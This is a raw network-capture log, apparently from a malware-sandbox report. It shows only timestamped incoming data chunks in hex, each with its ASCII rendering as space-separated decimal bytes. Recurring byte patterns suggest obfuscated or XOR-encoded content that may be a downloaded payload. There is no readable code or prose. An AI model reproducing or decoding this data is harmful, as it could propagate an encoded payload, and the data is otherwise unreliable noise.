                    2021-10-26 16:59:45 UTC3510INData Raw: 20 31 31 38 20 35 30 20 39 33 20 32 32 39 20 31 31 34 20 31 32 33 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 37 33 20 31 31 34 20 31 39 34 20 31 38 35 20 31 31 32 20 31 38 20 31 31 38 20 35 30 20 35 34 20 38 35 20 31 30 35 20 36 39 20 31 31 30 20 31 31 32 20 31 33 35 20 34 38 20 35 30 20 35 34 20 31 32 30 20 31 31 34 20 31 31 37 20 31 32 34 20 38 30 20 32 31 32 20 31 37 20 32 32 36 20 34 30 20 31 32 34 20 31 34 31 20 31 31 37 20 31 30 39 20 31 31 38 20 32 36 20 31 33 33 20 35 30 20 35 34 20 38 32 20 31 32 20 38 39 20 31 30 39 20 31 31 32 20 35 34 20 39 35 20 31 33 30 20 35 34 20 38 34 20 31 32 30 20 31 30 34 20 36 34 20 31 31 38 20 32 30 20 38 20 39 33 20 35 34 20 38 34 20 31 31 34 20 31 32 30 20 37 30 20 31 33 36 20 33 32 20 35 31 20
                    Data Ascii: 118 50 93 229 114 123 109 112 50 48 50 54 73 114 194 185 112 18 118 50 54 85 105 69 110 112 135 48 50 54 120 114 117 124 80 212 17 226 40 124 141 117 109 118 26 133 50 54 82 12 89 109 112 54 95 130 54 84 120 104 64 118 20 8 93 54 84 114 120 70 136 32 51
                    2021-10-26 16:59:45 UTC3512INData Raw: 37 20 31 35 32 20 34 39 20 34 38 20 35 30 20 38 39 20 32 34 20 31 31 34 20 31 31 37 20 31 30 37 20 31 34 20 31 31 36 20 34 38 20 35 30 20 35 30 20 35 39 20 36 31 20 31 31 37 20 31 30 39 20 31 31 38 20 32 34 20 31 37 36 20 31 31 37 20 35 34 20 38 34 20 31 31 38 20 37 37 20 35 36 20 31 34 33 20 32 30 35 20 32 30 37 20 31 37 38 20 31 35 20 38 34 20 31 31 34 20 31 31 33 20 38 35 20 33 39 20 32 30 35 20 32 30 37 20 32 30 35 20 31 38 32 20 31 31 30 20 31 31 34 20 31 31 37 20 31 30 35 20 37 32 20 31 30 37 20 32 30 37 20 32 30 35 20 32 30 31 20 38 34 20 31 31 33 20 36 39 20 31 31 30 20 31 31 32 20 32 30 38 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 34 20 39 20 34 38 20 35 30 20 35 30 20 31 31 36 20 32 30 35 20 38 34 20 31 38 39
                    Data Ascii: 7 152 49 48 50 89 24 114 117 107 14 116 48 50 50 59 61 117 109 118 24 176 117 54 84 118 77 56 143 205 207 178 15 84 114 113 85 39 205 207 205 182 110 114 117 105 72 107 207 205 201 84 113 69 110 112 208 48 50 54 84 114 117 109 14 9 48 50 50 116 205 84 189
                    2021-10-26 16:59:45 UTC3513INData Raw: 20 32 34 31 20 31 30 39 20 31 31 32 20 35 30 20 32 39 20 35 30 20 35 34 20 36 39 20 31 20 31 38 33 20 31 30 39 20 31 31 32 20 35 36 20 33 39 20 33 31 20 35 33 20 31 31 34 20 38 39 20 31 31 34 20 32 33 37 20 39 33 20 35 30 20 34 38 20 35 34 20 32 39 20 38 34 20 31 32 20 31 31 20 31 30 39 20 31 31 32 20 35 34 20 32 34 20 32 34 31 20 35 34 20 38 34 20 31 32 30 20 38 38 20 31 31 31 20 31 37 34 20 38 31 20 37 38 20 37 36 20 35 34 20 38 34 20 31 31 38 20 38 35 20 32 33 36 20 38 32 20 32 32 36 20 34 36 20 32 36 20 32 30 31 20 38 34 20 31 31 34 20 31 31 35 20 36 39 20 31 38 30 20 35 30 20 34 38 20 35 36 20 34 30 20 31 32 31 20 31 32 32 20 38 33 20 31 32 33 20 31 31 30 20 33 31 20 35 34 20 32 30 20 32 39 20 37 34 20 31 32 37 20 39 34 20 31 35 35 20 31 32 34 20 32
                    Data Ascii: 241 109 112 50 29 50 54 69 1 183 109 112 56 39 31 53 114 89 114 237 93 50 48 54 29 84 12 11 109 112 54 24 241 54 84 120 88 111 174 81 78 76 54 84 118 85 236 82 226 46 26 201 84 114 115 69 180 50 48 56 40 121 122 83 123 110 31 54 20 29 74 127 94 155 124 2
                    2021-10-26 16:59:45 UTC3514INData Raw: 20 31 31 34 20 31 31 37 20 31 30 37 20 31 30 33 20 32 34 20 33 35 20 35 35 20 31 34 20 31 32 35 20 31 34 31 20 31 33 38 20 31 34 36 20 39 39 20 35 34 20 38 20 32 20 32 30 31 20 31 37 31 20 31 34 31 20 39 39 20 37 31 20 31 31 32 20 35 30 20 34 38 20 33 33 20 36 20 38 30 20 31 31 34 20 32 35 20 31 30 39 20 31 31 32 20 35 30 20 33 31 20 35 30 20 35 34 20 36 39 20 31 30 30 20 31 31 39 20 32 32 37 20 31 39 39 20 33 37 20 31 30 35 20 34 30 20 32 37 20 38 33 20 38 34 20 31 30 35 20 36 34 20 31 31 38 20 32 30 20 32 37 20 31 30 31 20 35 39 20 31 32 37 20 31 33 33 20 31 32 37 20 37 30 20 31 33 36 20 34 38 20 35 34 20 31 36 38 20 36 36 20 32 35 35 20 31 31 34 20 31 31 37 20 31 30 38 20 31 30 36 20 33 31 20 34 33 20 32 30 20 35 32 20 38 32 20 31 30 31 20 34 35 20 32
                    Data Ascii: 114 117 107 103 24 35 55 14 125 141 138 146 99 54 8 2 201 171 141 99 71 112 50 48 33 6 80 114 25 109 112 50 31 50 54 69 100 119 227 199 37 105 40 27 83 84 105 64 118 20 27 101 59 127 133 127 70 136 48 54 168 66 255 114 117 108 106 31 43 20 52 82 101 45 2
                    2021-10-26 16:59:45 UTC3516INData Raw: 20 31 32 34 20 31 39 20 31 38 39 20 35 30 20 34 38 20 35 36 20 33 30 20 31 35 34 20 31 31 34 20 31 31 37 20 31 30 33 20 39 32 20 35 33 20 32 37 20 34 39 20 35 39 20 31 32 37 20 31 35 36 20 39 37 20 37 31 20 31 34 20 32 35 35 20 34 38 20 35 30 20 36 30 20 39 33 20 39 30 20 31 36 34 20 31 30 39 20 31 31 32 20 35 32 20 33 37 20 33 31 20 33 38 20 31 31 34 20 31 31 37 20 31 31 20 31 36 30 20 31 31 32 20 35 30 20 35 38 20 32 36 20 32 34 38 20 38 34 20 31 31 34 20 31 32 37 20 36 35 20 31 31 39 20 32 35 20 35 31 20 35 37 20 32 39 20 31 38 36 20 31 30 32 20 39 35 20 31 39 20 31 38 39 20 35 30 20 34 38 20 35 36 20 36 33 20 31 32 34 20 31 36 30 20 31 31 37 20 31 30 39 20 31 31 38 20 34 33 20 32 39 20 35 38 20 31 36 20 36 39 20 31 31 39 20 39 39 20 39 34 20 31 32 30
                    Data Ascii: 124 19 189 50 48 56 30 154 114 117 103 92 53 27 49 59 127 156 97 71 14 255 48 50 60 93 90 164 109 112 52 37 31 38 114 117 11 160 112 50 58 26 248 84 114 127 65 119 25 51 57 29 186 102 95 19 189 50 48 56 63 124 160 117 109 118 43 29 58 16 69 119 99 94 120
                    2021-10-26 16:59:45 UTC3517INData Raw: 34 20 31 31 37 20 31 30 35 20 39 32 20 33 34 20 35 34 20 31 38 20 31 30 37 20 31 31 38 20 31 36 32 20 31 30 37 20 36 39 20 31 34 33 20 35 30 20 34 38 20 35 32 20 33 30 20 32 32 34 20 31 31 34 20 31 31 37 20 31 30 37 20 38 38 20 38 33 20 34 38 20 35 30 20 36 30 20 31 33 38 20 31 31 34 20 39 35 20 31 30 39 20 31 31 33 20 33 34 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 31 20 31 31 37 20 38 39 20 33 33 20 35 30 20 32 31 20 31 31 36 20 35 34 20 38 34 20 31 31 35 20 31 30 32 20 39 33 20 31 31 36 20 35 30 20 38 34 20 35 30 20 35 34 20 38 34 20 37 31 20 31 31 37 20 31 30 39 20 39 37 20 33 36 20 32 34 20 31 31 36 20 35 35 20 38 34 20 31 31 36 20 31 30 39 20 36 34 20 31 31 39 20 32 30 20 34 33 20 33 31 20 34 38 20 31 31 34 20 38 39 20 36 33 20 39 37 20 39 31 20
                    Data Ascii: 4 117 105 92 34 54 18 107 118 162 107 69 143 50 48 52 30 224 114 117 107 88 83 48 50 60 138 114 95 109 113 34 48 50 54 84 111 117 89 33 50 21 116 54 84 115 102 93 116 50 84 50 54 84 71 117 109 97 36 24 116 55 84 116 109 64 119 20 43 31 48 114 89 63 97 91
                    2021-10-26 16:59:45 UTC3518INData Raw: 38 34 20 31 31 34 20 37 35 20 36 39 20 37 37 20 35 31 20 34 38 20 35 32 20 32 37 20 38 35 20 38 38 20 39 38 20 36 39 20 32 34 36 20 35 30 20 34 38 20 35 32 20 32 38 20 37 31 20 36 36 20 31 31 33 20 31 30 39 20 39 35 20 35 31 20 34 38 20 35 30 20 31 20 38 34 20 31 31 34 20 31 30 30 20 36 39 20 37 33 20 35 31 20 34 38 20 35 32 20 31 35 20 31 31 32 20 31 31 35 20 31 31 37 20 31 30 39 20 31 34 20 37 38 20 34 38 20 35 30 20 35 30 20 31 32 31 20 31 31 35 20 39 35 20 31 39 20 31 31 20 35 30 20 34 38 20 35 34 20 32 37 20 38 33 20 31 32 20 36 38 20 31 30 39 20 31 31 32 20 35 34 20 32 37 20 35 35 20 37 32 20 31 30 30 20 31 31 34 20 31 31 37 20 31 30 35 20 31 30 36 20 33 31 20 36 31 20 32 30 20 37 32 20 34 37 20 31 31 34 20 31 31 37 20 31 30 35 20 37 33 20 31 35 33
                    Data Ascii: 84 114 75 69 77 51 48 52 27 85 88 98 69 246 50 48 52 28 71 66 113 109 95 51 48 50 1 84 114 100 69 73 51 48 52 15 112 115 117 109 14 78 48 50 50 121 115 95 19 11 50 48 54 27 83 12 68 109 112 54 27 55 72 100 114 117 105 106 31 61 20 72 47 114 117 105 73 153
                    2021-10-26 16:59:45 UTC3520INData Raw: 30 20 31 39 31 20 31 31 34 20 31 31 37 20 31 30 33 20 31 30 35 20 33 31 20 35 30 20 32 30 20 32 38 20 31 31 34 20 38 39 20 31 33 37 20 31 30 39 20 31 31 35 20 32 20 35 37 20 35 30 20 32 30 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 32 36 20 38 20 38 35 20 31 31 34 20 31 31 35 20 36 35 20 31 30 36 20 33 38 20 32 30 36 20 35 32 20 32 34 36 20 38 34 20 31 31 34 20 31 31 35 20 33 30 20 31 35 34 20 35 30 20 34 38 20 35 36 20 33 30 20 31 39 31 20 31 31 34 20 31 31 37 20 31 30 33 20 31 31 30 20 33 31 20 35 31 20 32 30 20 32 39 20 38 37 20 38 34 20 39 34 20 31 30 39 20 39 30 20 35 30 20 34 38 20 33 33 20 36 20 38 30 20 31 31 34 20 35 35 20 31 30 39 20 31 31 32 20 35 30 20 38 20 35 30 20 35 34 20 36 39 20 31 32 20 31 35 33 20 31
                    Data Ascii: 0 191 114 117 103 105 31 50 20 28 114 89 137 109 115 2 57 50 20 84 114 117 109 112 50 48 26 8 85 114 115 65 106 38 206 52 246 84 114 115 30 154 50 48 56 30 191 114 117 103 110 31 51 20 29 87 84 94 109 90 50 48 33 6 80 114 55 109 112 50 8 50 54 69 12 153 1
                    2021-10-26 16:59:45 UTC3521INData Raw: 20 35 31 20 31 31 39 20 31 36 32 20 31 30 37 20 36 39 20 31 34 33 20 35 30 20 34 38 20 35 32 20 33 30 20 32 35 32 20 31 31 34 20 31 31 37 20 31 30 33 20 31 30 36 20 33 31 20 35 34 20 32 30 20 32 39 20 38 32 20 31 32 31 20 39 34 20 31 33 38 20 31 32 34 20 32 35 20 34 38 20 35 38 20 33 30 20 32 35 30 20 31 31 34 20 31 31 37 20 31 30 33 20 39 32 20 34 36 20 35 36 20 32 36 20 31 35 33 20 38 34 20 31 31 34 20 31 32 37 20 31 31 39 20 39 33 20 33 34 20 32 32 20 35 39 20 33 32 20 31 32 34 20 31 33 33 20 31 31 37 20 31 30 39 20 31 32 32 20 32 36 20 32 30 30 20 35 30 20 35 34 20 39 34 20 31 32 31 20 31 37 31 20 39 30 20 31 32 35 20 32 35 20 32 32 32 20 35 38 20 33 36 20 38 35 20 39 30 20 31 34 30 20 31 30 39 20 31 31 32 20 35 36 20 32 34 20 32 30 30 20 35 34 20 38
                    Data Ascii: 51 119 162 107 69 143 50 48 52 30 252 114 117 103 106 31 54 20 29 82 121 94 138 124 25 48 58 30 250 114 117 103 92 46 56 26 153 84 114 127 119 93 34 22 59 32 124 133 117 109 122 26 200 50 54 94 121 171 90 125 25 222 58 36 85 90 140 109 112 56 24 200 54 8
                    2021-10-26 16:59:45 UTC3522INData Raw: 20 35 30 20 36 30 20 31 32 34 20 31 36 37 20 31 31 37 20 31 30 39 20 31 31 38 20 34 30 20 32 39 20 35 35 20 31 36 20 31 32 36 20 38 34 20 39 34 20 31 33 37 20 38 36 20 32 35 20 32 30 31 20 35 30 20 35 34 20 38 34 20 39 37 20 36 39 20 31 31 30 20 31 31 32 20 31 35 31 20 34 38 20 35 30 20 35 34 20 31 30 37 20 31 31 34 20 31 31 37 20 31 32 34 20 33 20 39 31 20 34 39 20 35 30 20 34 38 20 37 36 20 39 35 20 35 37 20 37 35 20 31 31 38 20 32 36 20 31 31 39 20 35 31 20 35 34 20 38 32 20 32 39 20 32 34 33 20 31 30 38 20 31 31 32 20 35 32 20 35 34 20 32 36 20 31 32 36 20 38 35 20 31 31 34 20 31 31 35 20 32 20 32 34 38 20 35 31 20 34 38 20 35 32 20 34 38 20 31 32 34 20 35 39 20 31 31 36 20 31 30 39 20 31 31 38 20 39 33 20 37 38 20 35 31 20 35 34 20 38 32 20 31 31 36
                    Data Ascii: 50 60 124 167 117 109 118 40 29 55 16 126 84 94 137 86 25 201 50 54 84 97 69 110 112 151 48 50 54 107 114 117 124 3 91 49 50 48 76 95 57 75 118 26 119 51 54 82 29 243 108 112 52 54 26 126 85 114 115 2 248 51 48 52 48 124 59 116 109 118 93 78 51 54 82 116
                    2021-10-26 16:59:45 UTC3524INData Raw: 39 37 20 34 38 20 34 20 33 32 20 31 32 34 20 32 34 34 20 31 31 37 20 31 30 39 20 31 31 38 20 33 36 20 32 34 20 35 34 20 35 35 20 38 34 20 31 32 30 20 39 35 20 31 30 39 20 31 31 32 20 31 31 32 20 32 34 20 31 31 32 20 35 35 20 38 34 20 31 31 36 20 39 33 20 31 37 39 20 31 31 32 20 35 30 20 35 38 20 32 36 20 31 38 38 20 38 34 20 31 31 34 20 31 31 35 20 37 31 20 31 31 32 20 35 30 20 34 38 20 33 33 20 36 20 38 30 20 31 31 34 20 37 33 20 31 30 39 20 31 31 32 20 35 30 20 36 32 20 35 30 20 35 34 20 36 39 20 39 30 20 32 33 34 20 31 30 39 20 31 31 32 20 35 32 20 33 39 20 33 31 20 37 20 31 31 34 20 38 32 20 31 30 31 20 37 33 20 31 36 30 20 34 34 20 32 34 20 32 30 35 20 35 34 20 38 34 20 31 31 36 20 31 31 35 20 36 39 20 37 30 20 35 31 20 34 38 20 35 32 20 31 38 36 20
                    Data Ascii: 97 48 4 32 124 244 117 109 118 36 24 54 55 84 120 95 109 112 112 24 112 55 84 116 93 179 112 50 58 26 188 84 114 115 71 112 50 48 33 6 80 114 73 109 112 50 62 50 54 69 90 234 109 112 52 39 31 7 114 82 101 73 160 44 24 205 54 84 116 115 69 70 51 48 52 186
                    2021-10-26 16:59:45 UTC3525INData Raw: 34 33 20 35 30 20 34 38 20 35 32 20 35 32 20 31 32 34 20 34 36 20 31 31 37 20 31 30 39 20 31 32 32 20 34 37 20 32 39 20 32 35 20 31 36 20 31 31 36 20 31 36 36 20 38 30 20 31 38 39 20 31 31 30 20 32 36 20 32 30 37 20 35 30 20 35 34 20 38 32 20 31 31 37 20 39 33 20 32 35 33 20 31 31 32 20 35 30 20 35 34 20 34 31 20 32 37 20 37 38 20 38 34 20 31 32 35 20 36 39 20 31 34 38 20 35 30 20 34 38 20 35 36 20 34 37 20 31 32 31 20 39 37 20 38 33 20 31 32 34 20 31 31 36 20 34 39 20 39 35 20 35 38 20 35 35 20 38 34 20 31 32 30 20 38 39 20 31 32 32 20 39 31 20 35 36 20 35 39 20 32 35 20 32 32 39 20 38 38 20 38 39 20 31 34 35 20 31 32 36 20 31 31 36 20 32 35 20 32 31 38 20 33 35 20 35 30 20 35 39 20 31 32 33 20 31 31 36 20 31 30 39 20 31 32 32 20 33 36 20 32 30 36 20 35
                    Data Ascii: 43 50 48 52 52 124 46 117 109 122 47 29 25 16 116 166 80 189 110 26 207 50 54 82 117 93 253 112 50 54 41 27 78 84 125 69 148 50 48 56 47 121 97 83 124 116 49 95 58 55 84 120 89 122 91 56 59 25 229 88 89 145 126 116 25 218 35 50 59 123 116 109 122 36 206 5
                    2021-10-26 16:59:45 UTC3526INData Raw: 39 20 31 32 32 20 36 33 20 35 37 20 32 36 20 38 37 20 38 35 20 31 31 34 20 31 31 35 20 39 37 20 31 32 31 20 39 33 20 37 33 20 35 30 20 35 34 20 39 34 20 31 31 37 20 31 32 35 20 31 32 33 20 38 38 20 37 36 20 34 38 20 35 30 20 36 30 20 36 36 20 31 34 30 20 31 31 36 20 31 30 33 20 31 37 34 20 30 20 36 31 20 32 35 20 32 35 33 20 39 35 20 38 39 20 31 36 37 20 37 32 20 38 38 20 31 32 36 20 34 38 20 35 30 20 36 30 20 37 31 20 31 31 38 20 31 30 30 20 31 30 35 20 38 30 20 31 31 32 20 32 31 20 32 32 36 20 34 30 20 31 32 34 20 31 34 31 20 31 31 37 20 31 30 39 20 31 31 38 20 32 36 20 31 33 32 20 35 30 20 35 34 20 38 32 20 39 30 20 32 30 20 31 30 39 20 31 31 32 20 35 36 20 32 33 38 20 35 36 20 36 33 20 31 32 30 20 31 31 36 20 31 32 34 20 32 20 39 20 35 30 20 34 38 20
                    Data Ascii: 9 122 63 57 26 87 85 114 115 97 121 93 73 50 54 94 117 125 123 88 76 48 50 60 66 140 116 103 174 0 61 25 253 95 89 167 72 88 126 48 50 60 71 118 100 105 80 112 21 226 40 124 141 117 109 118 26 132 50 54 82 90 20 109 112 56 238 56 63 120 116 124 2 9 50 48
                    2021-10-26 16:59:45 UTC3528INData Raw: 20 35 31 20 34 38 20 35 36 20 32 33 32 20 31 31 32 20 38 37 20 39 33 20 33 33 20 31 31 32 20 35 30 20 35 38 20 34 30 20 32 37 20 37 36 20 38 34 20 31 32 35 20 37 37 20 39 37 20 32 33 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 38 38 20 31 33 34 20 34 38 20 35 30 20 34 38 20 31 32 34 20 31 39 20 31 31 37 20 31 30 39 20 31 32 32 20 32 33 36 20 35 31 20 36 32 20 32 39 20 31 37 38 20 38 38 20 38 31 20 31 30 38 20 31 30 38 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 36 35 20 38 39 20 31 31 32 20 32 32 20 31 31 38 20 35 30 20 35 34 20 38 35 20 31 31 34 20 31 31 37 20 35 33 20 31 31 32 20 34 34 20 37 30 20 35 30 20 31 38 20 31 38 20 31 31 34 20 31 31 37 20 31 30 38 20 31 30 37 20 32 20 35 32 20 35 30 20 31 39
                    Data Ascii: 51 48 56 232 112 87 93 33 112 50 58 40 27 76 84 125 77 97 23 224 44 30 171 114 117 107 88 134 48 50 48 124 19 117 109 122 236 51 62 29 178 88 81 108 108 50 48 50 54 84 114 65 89 112 22 118 50 54 85 114 117 53 112 44 70 50 18 18 114 117 108 107 2 52 50 19
                    2021-10-26 16:59:45 UTC3529INData Raw: 31 30 38 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 36 35 20 38 39 20 31 31 32 20 32 32 20 31 31 38 20 35 30 20 35 34 20 38 35 20 31 31 34 20 31 31 37 20 35 33 20 31 31 32 20 34 34 20 37 30 20 35 30 20 31 38 20 31 38 20 31 31 34 20 31 31 37 20 31 30 38 20 31 30 37 20 32 20 35 32 20 35 30 20 39 32 20 38 34 20 31 31 34 20 31 31 37 20 34 32 20 31 31 32 20 35 30 20 33 33 20 37 36 20 32 31 38 20 38 34 20 31 31 34 20 31 32 37 20 31 39 20 39 35 20 35 30 20 34 38 20 35 34 20 33 32 20 35 39 20 31 35 39 20 31 31 37 20 31 30 39 20 31 32 32 20 34 36 20 32 39 20 33 30 20 31 36 20 38 33 20 31 32 20 31 30 20 31 30 39 20 31 31 32 20 35 34 20 37 38 20 37 37 20 35 34 20 38 34 20 31 32 30 20 32 36 20 31 33 31 20 31 31 32 20 35 30 20 35 38 20 32 36 20 33 35
                    Data Ascii: 108 50 48 50 54 84 114 65 89 112 22 118 50 54 85 114 117 53 112 44 70 50 18 18 114 117 108 107 2 52 50 92 84 114 117 42 112 50 33 76 218 84 114 127 19 95 50 48 54 32 59 159 117 109 122 46 29 30 16 83 12 10 109 112 54 78 77 54 84 120 26 131 112 50 58 26 35
                    2021-10-26 16:59:45 UTC3530INData Raw: 20 31 31 32 20 35 32 20 32 34 20 34 32 20 35 35 20 38 34 20 31 32 30 20 38 35 20 31 33 32 20 38 36 20 32 32 36 20 34 36 20 32 36 20 32 30 31 20 38 34 20 31 31 34 20 31 31 35 20 31 39 20 31 35 20 35 30 20 34 38 20 35 36 20 38 39 20 31 38 38 20 31 31 34 20 31 31 37 20 31 30 33 20 33 31 20 34 33 20 34 39 20 35 30 20 36 30 20 36 37 20 39 35 20 38 39 20 37 35 20 31 34 20 37 36 20 34 38 20 35 30 20 35 30 20 38 33 20 38 32 20 32 32 38 20 37 35 20 31 36 30 20 34 34 20 32 34 20 32 30 35 20 35 34 20 38 34 20 31 31 36 20 39 33 20 31 33 32 20 31 31 32 20 35 30 20 35 38 20 32 36 20 31 35 38 20 38 34 20 31 31 34 20 31 32 37 20 31 31 37 20 39 33 20 33 35 20 32 32 20 35 32 20 33 30 20 32 35 30 20 31 31 34 20 31 31 37 20 31 30 33 20 39 32 20 36 33 20 32 37 20 35 39 20 35
                    Data Ascii: 112 52 24 42 55 84 120 85 132 86 226 46 26 201 84 114 115 19 15 50 48 56 89 188 114 117 103 31 43 49 50 60 67 95 89 75 14 76 48 50 50 83 82 228 75 160 44 24 205 54 84 116 93 132 112 50 58 26 158 84 114 127 117 93 35 22 52 30 250 114 117 103 92 63 27 59 5
                    2021-10-26 16:59:45 UTC3532INData Raw: 34 20 31 30 30 20 31 30 39 20 36 34 20 39 35 20 32 30 20 37 38 20 31 32 30 20 35 34 20 38 34 20 31 31 38 20 32 36 20 31 31 39 20 31 31 33 20 35 30 20 35 38 20 32 36 20 32 20 38 35 20 31 31 34 20 31 31 35 20 36 39 20 32 33 38 20 35 30 20 34 38 20 35 32 20 33 30 20 39 37 20 31 31 35 20 31 31 37 20 31 30 37 20 38 38 20 31 37 32 20 34 38 20 35 30 20 34 38 20 34 32 20 36 39 20 31 31 37 20 31 30 39 20 31 31 36 20 33 30 20 33 37 20 32 35 20 35 36 20 32 31 32 20 35 37 20 31 31 37 20 31 30 39 20 31 31 36 20 32 35 20 32 35 33 20 31 37 38 20 31 32 32 20 38 34 20 31 31 34 20 31 31 33 20 37 30 20 31 38 37 20 32 36 20 31 34 36 20 35 30 20 35 34 20 38 32 20 31 30 30 20 31 31 20 33 39 20 31 31 32 20 35 30 20 35 32 20 39 33 20 34 35 20 38 35 20 31 31 34 20 31 32 37 20 31
                    Data Ascii: 4 100 109 64 95 20 78 120 54 84 118 26 119 113 50 58 26 2 85 114 115 69 238 50 48 52 30 97 115 117 107 88 172 48 50 48 42 69 117 109 116 30 37 25 56 212 57 117 109 116 25 253 178 122 84 114 113 70 187 26 146 50 54 82 100 11 39 112 50 52 93 45 85 114 127 1
                    2021-10-26 16:59:45 UTC3533INData Raw: 33 38 20 34 38 20 31 32 36 20 31 32 30 20 39 38 20 36 34 20 31 31 33 20 33 34 20 34 38 20 35 30 20 35 32 20 38 34 20 31 30 32 20 31 31 37 20 31 31 37 20 39 32 20 35 30 20 35 35 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 30 20 39 33 20 31 31 36 20 35 30 20 31 38 33 20 35 30 20 35 34 20 38 34 20 36 33 20 31 31 37 20 31 30 39 20 39 37 20 37 36 20 31 30 20 35 30 20 35 34 20 38 30 20 39 35 20 31 31 36 20 37 31 20 31 34 20 38 20 34 38 20 35 30 20 35 30 20 35 39 20 34 34 20 31 31 37 20 31 30 39 20 31 32 32 20 34 37 20 32 39 20 34 39 20 31 36 20 31 32 37 20 33 39 20 31 32 31 20 37 30 20 31 33 39 20 33 32 20 35 30 20 32 36 20 31 30 35 20 38 34 20 31 31 34 20 31 32 37 20 31 31 39 20 39 33 20 35 37 20 32 32 20 35 32 20 37 37 20 36 35 20 31 31 34 20 31 31 37 20
                    Data Ascii: 38 48 126 120 98 64 113 34 48 50 52 84 102 117 117 92 50 55 50 54 84 114 110 93 116 50 183 50 54 84 63 117 109 97 76 10 50 54 80 95 116 71 14 8 48 50 50 59 44 117 109 122 47 29 49 16 127 39 121 70 139 32 50 26 105 84 114 127 119 93 57 22 52 77 65 114 117
                    2021-10-26 16:59:45 UTC3537INData Raw: 38 30 20 39 34 20 39 36 20 31 32 33 20 32 34 30 20 31 31 38 20 34 38 20 35 30 20 35 30 20 31 31 36 20 32 31 30 20 38 32 20 31 38 39 20 31 31 30 20 32 36 20 32 30 37 20 35 30 20 35 34 20 38 32 20 39 30 20 31 39 32 20 31 30 39 20 31 31 32 20 35 32 20 37 38 20 31 31 20 35 34 20 38 34 20 31 31 38 20 38 39 20 39 20 31 34 20 31 31 20 34 38 20 35 30 20 35 30 20 35 39 20 39 30 20 31 31 36 20 31 30 39 20 31 32 32 20 33 36 20 33 30 20 31 37 20 32 32 20 31 39 20 38 35 20 31 36 35 20 31 31 35 20 38 38 20 32 30 35 20 34 38 20 35 30 20 34 38 20 34 32 20 37 35 20 31 31 37 20 31 30 39 20 31 31 36 20 39 33 20 32 34 20 35 31 20 35 34 20 39 34 20 32 35 34 20 35 37 20 31 30 39 20 31 31 32 20 35 31 20 32 34 20 31 31 30 20 35 34 20 38 34 20 31 32 30 20 39 33 20 32 31 36 20 31
                    Data Ascii: 80 94 96 123 240 118 48 50 50 116 210 82 189 110 26 207 50 54 82 90 192 109 112 52 78 11 54 84 118 89 9 14 11 48 50 50 59 90 116 109 122 36 30 17 22 19 85 165 115 88 205 48 50 48 42 75 117 109 116 93 24 51 54 94 254 57 109 112 51 24 110 54 84 120 93 216 1
                    2021-10-26 16:59:45 UTC3541INData Raw: 20 35 32 20 35 31 20 34 37 20 34 30 20 31 32 31 20 38 35 20 38 33 20 32 20 36 32 20 35 30 20 34 38 20 35 36 20 35 33 20 35 39 20 39 33 20 31 31 36 20 31 30 39 20 31 32 32 20 32 36 20 31 35 37 20 35 30 20 35 34 20 39 34 20 39 30 20 31 39 32 20 31 30 39 20 31 31 32 20 35 32 20 37 38 20 37 37 20 35 34 20 38 34 20 31 32 30 20 39 33 20 32 31 36 20 31 31 32 20 35 30 20 35 34 20 32 34 20 31 36 20 31 32 37 20 32 30 32 20 38 33 20 37 30 20 31 37 36 20 32 30 20 32 37 20 32 32 39 20 35 33 20 31 30 30 20 31 31 39 20 31 31 37 20 31 35 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 20 31 38 20 31 31 32 20 35 30 20 35 38 20 32 36 20 31 33 31 20 38 34 20 31 31 34 20 31 31 35 20 37 37 20 32 30 33 20 32 36 20 32 32 34 20 34 34 20 33 30 20 31
                    Data Ascii: 52 51 47 40 121 85 83 2 62 50 48 56 53 59 93 116 109 122 26 157 50 54 94 90 192 109 112 52 78 77 54 84 120 93 216 112 50 54 24 16 127 202 83 70 176 20 27 229 53 100 119 117 15 112 50 48 50 54 84 114 11 18 112 50 58 26 131 84 114 115 77 203 26 224 44 30 1
                    2021-10-26 16:59:45 UTC3542INData Raw: 34 20 39 34 20 39 30 20 38 36 20 31 30 38 20 31 31 32 20 35 36 20 35 39 20 33 32 20 35 35 20 31 32 34 20 36 35 20 31 31 36 20 31 30 39 20 31 32 32 20 32 36 20 36 20 35 31 20 35 34 20 39 34 20 39 30 20 36 34 20 31 30 38 20 31 31 32 20 35 36 20 31 36 20 31 30 37 20 33 30 20 31 33 32 20 31 30 38 20 39 33 20 31 34 36 20 31 31 32 20 35 30 20 35 34 20 32 36 20 32 31 20 38 35 20 31 31 34 20 31 32 37 20 32 32 35 20 36 36 20 35 30 20 34 38 20 35 31 20 33 30 20 38 20 31 31 34 20 31 31 37 20 31 30 33 20 31 32 32 20 37 36 20 31 31 33 20 35 30 20 35 34 20 38 30 20 39 34 20 39 39 20 31 39 20 37 39 20 35 30 20 34 38 20 35 34 20 34 38 20 35 39 20 36 39 20 31 31 36 20 31 30 39 20 31 32 32 20 37 36 20 31 35 20 35 30 20 35 34 20 38 30 20 31 31 32 20 32 36 20 38 39 20 31 31
                    Data Ascii: 4 94 90 86 108 112 56 59 32 55 124 65 116 109 122 26 6 51 54 94 90 64 108 112 56 16 107 30 132 108 93 146 112 50 54 26 21 85 114 127 225 66 50 48 51 30 8 114 117 103 122 76 113 50 54 80 94 99 19 79 50 48 54 48 59 69 116 109 122 76 15 50 54 80 112 26 89 11
